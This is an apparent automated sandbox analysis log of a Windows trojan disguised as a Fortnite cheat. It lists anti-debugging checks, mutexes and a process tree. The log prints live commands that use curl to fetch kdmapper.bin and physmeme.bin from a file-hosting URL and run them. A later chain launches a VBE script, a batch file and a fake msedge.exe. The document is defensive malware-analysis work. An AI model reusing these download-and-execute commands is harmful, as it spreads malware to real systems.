                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD9C400_2_00007FF735DD9C40
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDD8400_2_00007FF735DDD840
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DCF0400_2_00007FF735DCF040
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD604D0_2_00007FF735DD604D
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB48200_2_00007FF735DB4820
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBA8000_2_00007FF735DBA800
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDA7E00_2_00007FF735DDA7E0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDB3D00_2_00007FF735DDB3D0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB8BA00_2_00007FF735DB8BA0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB97A00_2_00007FF735DB97A0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC0BA00_2_00007FF735DC0BA0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DE848E12_2_00DE848E
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DE40FE12_2_00DE40FE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF408812_2_00DF4088
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF00B712_2_00DF00B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E051C912_2_00E051C9
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF715312_2_00DF7153
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF62CA12_2_00DF62CA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DE32F712_2_00DE32F7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF43BF12_2_00DF43BF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E0D44012_2_00E0D440
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEF46112_2_00DEF461
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEC42612_2_00DEC426
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF77EF12_2_00DF77EF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E0D8EE12_2_00E0D8EE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DE286B12_2_00DE286B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E119F412_2_00E119F4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEE9B712_2_00DEE9B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF6CDC12_2_00DF6CDC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DF3E0B12_2_00DF3E0B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEEFE212_2_00DEEFE2
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E04F9A12_2_00E04F9A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043804019_2_00438040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042C07019_2_0042C070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044907019_2_00449070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040100019_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040B0E019_2_0040B0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040C08019_2_0040C080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042D15019_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004491F019_2_004491F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041F19319_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040924019_2_00409240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042C24319_2_0042C243
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004492F019_2_004492F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043E2A019_2_0043E2A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004012B319_2_004012B3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040135919_2_00401359
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041636119_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042D3CC19_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004493D019_2_004493D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004483B019_2_004483B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004113BD19_2_004113BD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040546019_2_00405460
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044742919_2_00447429
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004094D719_2_004094D7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040A4E019_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042B49019_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004074B019_2_004074B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040B57019_2_0040B570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004366E019_2_004366E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041D6A019_2_0041D6A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044970019_2_00449700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004117C019_2_004117C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042F7DB19_2_0042F7DB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040885019_2_00408850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040389019_2_00403890
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044A8B019_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004488B019_2_004488B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043697019_2_00436970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0045392E19_2_0045392E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041399C19_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040AA0019_2_0040AA00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00427AFB19_2_00427AFB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042BC5019_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00413CC619_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042CCDD19_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042CCF519_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00429DF219_2_00429DF2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00437D9019_2_00437D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040CE0019_2_0040CE00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00431E0019_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00415EF619_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407EB019_2_00407EB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00427F6219_2_00427F62
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00443FA019_2_00443FA0
                                Source: C:\Edge\msedge.exeCode function: 23_2_00007FFAAB790D8023_2_00007FFAAB790D80
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 40_2_00007FFAAB780D8040_2_00007FFAAB780D80
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB790D8041_2_00007FFAAB790D80
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A0B0641_2_00007FFAAB7A0B06
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A0FC741_2_00007FFAAB7A0FC7
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A177E41_2_00007FFAAB7A177E
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A11A941_2_00007FFAAB7A11A9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7C122541_2_00007FFAAB7C1225
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7C97D941_2_00007FFAAB7C97D9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7CBF4241_2_00007FFAAB7CBF42
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7CD30A41_2_00007FFAAB7CD30A
                                Source: C:\Edge\msedge.exeCode function: 42_2_00007FFAAB7A0D8042_2_00007FFAAB7A0D80
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A0B0643_2_00007FFAAB7A0B06
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A0FC743_2_00007FFAAB7A0FC7
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A177E43_2_00007FFAAB7A177E
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A11A943_2_00007FFAAB7A11A9
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB790D8043_2_00007FFAAB790D80
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7C122543_2_00007FFAAB7C1225
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7C97D943_2_00007FFAAB7C97D9
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7CBF4243_2_00007FFAAB7CBF42
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7CD30A43_2_00007FFAAB7CD30A
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAB770D8049_2_00007FFAAB770D80
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAABB62B5A49_2_00007FFAABB62B5A
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A0B0654_2_00007FFAAB7A0B06
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A0FC754_2_00007FFAAB7A0FC7
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A177E54_2_00007FFAAB7A177E
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A11A954_2_00007FFAAB7A11A9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7C122554_2_00007FFAAB7C1225
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7C97D954_2_00007FFAAB7C97D9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7CBF4254_2_00007FFAAB7CBF42
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB790D8054_2_00007FFAAB790D80
                                Source: Joe Sandbox ViewDropped File: C:\Edge\msedge.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Idle.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00DFEC50 appears 56 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00DFF5F0 appears 31 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00DFEB78 appears 39 times
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: String function: 00007FF735DDE9C0 appears 142 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CBE0 appears 53 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EE60 appears 145 times
                                Source: WjFdZuSe.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: onyQOgMn.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: YlsMudWZ.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: PDYwKARr.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: MsCvKimq.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: msedge.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: physmeme.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: Idle.exe.23.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: WjFdZuSe.log.23.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: onyQOgMn.log.23.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: YlsMudWZ.log.23.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: PDYwKARr.log.23.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: MsCvKimq.log.23.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@74/64@22/4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DE6C74 GetLastError,FormatMessageW,12_2_00DE6C74
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004345E0 CoCreateInstance,19_2_004345E0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,12_2_00DFA6C2
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP
                                Source: C:\Windows\Speech\physmeme.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.logJump to behavior
                                Source: C:\Users\user\AppData\Local\Idle.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Idle.exeMutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2864:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\3htq1mnqJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxname12_2_00DFDF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxstime12_2_00DFDF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: STARTDLG12_2_00DFDF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: xz12_2_00DFDF1E
                                Source: NCTSgL4t0B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: NCTSgL4t0B.exeReversingLabs: Detection: 52%
                                Source: NCTSgL4t0B.exeString found in binary or memory: Save/Load
                                Source: NCTSgL4t0B.exeString found in binary or memory: Save/Load
                                Source: NCTSgL4t0B.exeString found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: clsDriver Error Contact Support. Driver Found Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too long:
                                Source: unknownProcess created: C:\Users\user\Desktop\NCTSgL4t0B.exe "C:\Users\user\Desktop\NCTSgL4t0B.exe"
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
